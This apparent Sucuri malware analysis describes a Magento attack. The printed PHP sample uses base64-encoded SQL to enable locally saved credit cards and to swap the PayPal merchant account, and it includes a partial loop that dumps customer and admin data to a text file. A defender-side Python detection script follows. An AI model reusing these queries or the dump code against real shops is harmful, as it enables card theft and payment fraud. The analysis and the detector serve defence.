During the initial stages of the attack, the bad actor uses special SQL queries encoded in base64. We've decoded these strings under their respective lines in the sample below for your reference:

    $ConfKiller = array(
        'Update DB (Savecc)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='),
        // UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';
        'Update PP (MailPP)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7')
        // UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account';
    );

In $ConfKiller, two major malicious operations are being executed:

Update DB (Savecc): This query switches on Magento's "saved credit card" (ccsave) payment method, so the client's credit card details are stored locally in the shop instead of being handed to the payment gateway that would normally protect the payment information.

Update PP (MailPP): This query changes the PayPal merchant business account associated with the Magento website, so PayPal payments are redirected to the attacker's account.

Though Magento does encrypt the locally saved credit card information, in this scenario that is not enough, because the attacker can modify the Magento core files to steal the encryption key from Magento's configuration file (./app/etc/local.xml). Once the attacker has access to your site, the attack usually doesn't remain limited to just the credit card information. Rather, the attacker gains access to everything in the database.

For this, the attacker can create an additional variable in the SQL queries to extract the information from the compromised Magento database:

    $query = array(
        'admin_user' => 'SELECT * FROM admin_user',
        'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients',
        'aw_blog_comment' => 'SELECT * FROM aw_blog_comment',
        'customer_entity' => 'SELECT * FROM customer_entity',

The array listing has been shortened for brevity, but it pulls any customer information stored in the most common Magento database tables (e.g. customer_entity, newsletter_subscriber). It then trims this data, keeping only the information required for fraudulent purchases. Finally, it generates a *-shcMail.txt file in the directory containing the relevant customer information:

    // one dump file per run, named after the MD5 of the current timestamp
    $namefile = md5(time())."-shcMail.txt";
    foreach ($query as $shc_key => $shc_query) {
        $hasil = mysql_query($shc_query);
        while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
            // $shcolom maps each table to the single column worth keeping
            $mail[] = $kolom_db[$shcolom[$shc_key]];
            $myfile = fopen($namefile, "a+") or die("Unable to open file!");
            fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."\r\n");
            fclose($myfile);

When running this malicious script in a web browser, it simply provides a hyperlink to the generated *-shcMail.txt file. It then reports back to inform the attacker whether the initial two setting changes were successful or not.
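The two setting changes and the dump file above are all detectable from the defender's side. The following Python script is an added example and is not Sucuri's code or part of the analysed sample: it decodes base64_decode('...') literals found in PHP source and flags any that rewrite the two sensitive core_config_data rows, compares live (path, value) rows against an expected baseline, and spots file names built like md5(time())."-shcMail.txt". The two base64 literals are the ones shown in the sample; the baseline values in EXPECTED_CONFIG, the SAMPLE_ROWS and the SAMPLE_FILES are constructed for a hypothetical shop.

```python
"""Defender-side checks for the Magento config tampering and dump file
described above. Added example; the expected setting values, the rows and
the file names below are constructed, not taken from a real shop."""
import base64
import re

# Matches base64_decode('...') literals in PHP source. Whitespace is allowed
# inside the literal because copied samples are often line-wrapped.
B64_LITERAL = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=\s]+)'\s*\)")

# Settings the sample rewrites, with the values a clean shop is assumed to
# hold (baseline for a hypothetical store; adjust to your own configuration).
EXPECTED_CONFIG = {
    "payment/ccsave/active": "0",
    "paypal/general/business_account": "merchant@example.com",
}

# The dump file is named md5(time()) . "-shcMail.txt": 32 hex chars plus suffix.
EXFIL_FILE = re.compile(r"^[0-9a-f]{32}-shcMail\.txt$")


def decode_php_base64_literals(php_source):
    """Return the decoded text of every base64_decode('...') literal found."""
    decoded = []
    for match in B64_LITERAL.finditer(php_source):
        raw = re.sub(r"\s+", "", match.group(1))  # undo line wrapping
        try:
            decoded.append(base64.b64decode(raw, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue  # not valid base64: skip it rather than abort the scan
    return decoded


def find_config_tampering_sql(decoded_strings):
    """Return the sensitive config paths targeted by decoded UPDATE statements."""
    hits = []
    for text in decoded_strings:
        flat = " ".join(text.split()).lower()  # collapse CRLF/LF and spacing
        if "update `core_config_data`" not in flat and "update core_config_data" not in flat:
            continue
        hits.extend(path for path in EXPECTED_CONFIG if path in flat)
    return hits


def audit_config_rows(rows, expected=EXPECTED_CONFIG):
    """Compare (path, value) rows from core_config_data with the baseline.
    Returns (path, actual, expected) for every sensitive setting that drifted."""
    return [(path, value, expected[path])
            for path, value in rows
            if path in expected and value != expected[path]]


def find_exfil_artifacts(filenames):
    """Return file names that match the dump-file naming pattern."""
    return [name for name in filenames if EXFIL_FILE.match(name)]


# --- constructed sample input --------------------------------------------
# PHP fragment carrying the two base64 literals from the analysed sample,
# left line-wrapped exactly as they appear when copied from the write-up.
SAMPLE_PHP = r"""
$ConfKiller = array(
    'Update DB (Savecc)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVf aWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF 0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='),
    'Update PP (MailPP)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lk YCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3R lZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7')
);
"""

# Constructed core_config_data rows of a shop after the two updates ran.
SAMPLE_ROWS = [
    ("payment/ccsave/active", "1"),
    ("paypal/general/business_account", "[redacted]@gmail.com"),
    ("web/unsecure/base_url", "http://shop.example/"),
]

# Constructed directory listing; the hex name is md5("") used as a stand-in.
SAMPLE_FILES = [
    "index.php",
    "d41d8cd98f00b204e9800998ecf8427e-shcMail.txt",
    "shcMail.txt",
]

if __name__ == "__main__":
    decoded = decode_php_base64_literals(SAMPLE_PHP)
    print("config paths rewritten by decoded SQL:", find_config_tampering_sql(decoded))
    print("drifted settings:", audit_config_rows(SAMPLE_ROWS))
    print("dump files on disk:", find_exfil_artifacts(SAMPLE_FILES))
```

In production the rows would come from `SELECT path, value FROM core_config_data` and the file list from the web root; the three functions are kept independent so each check can run on its own schedule.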
Source: Sucuri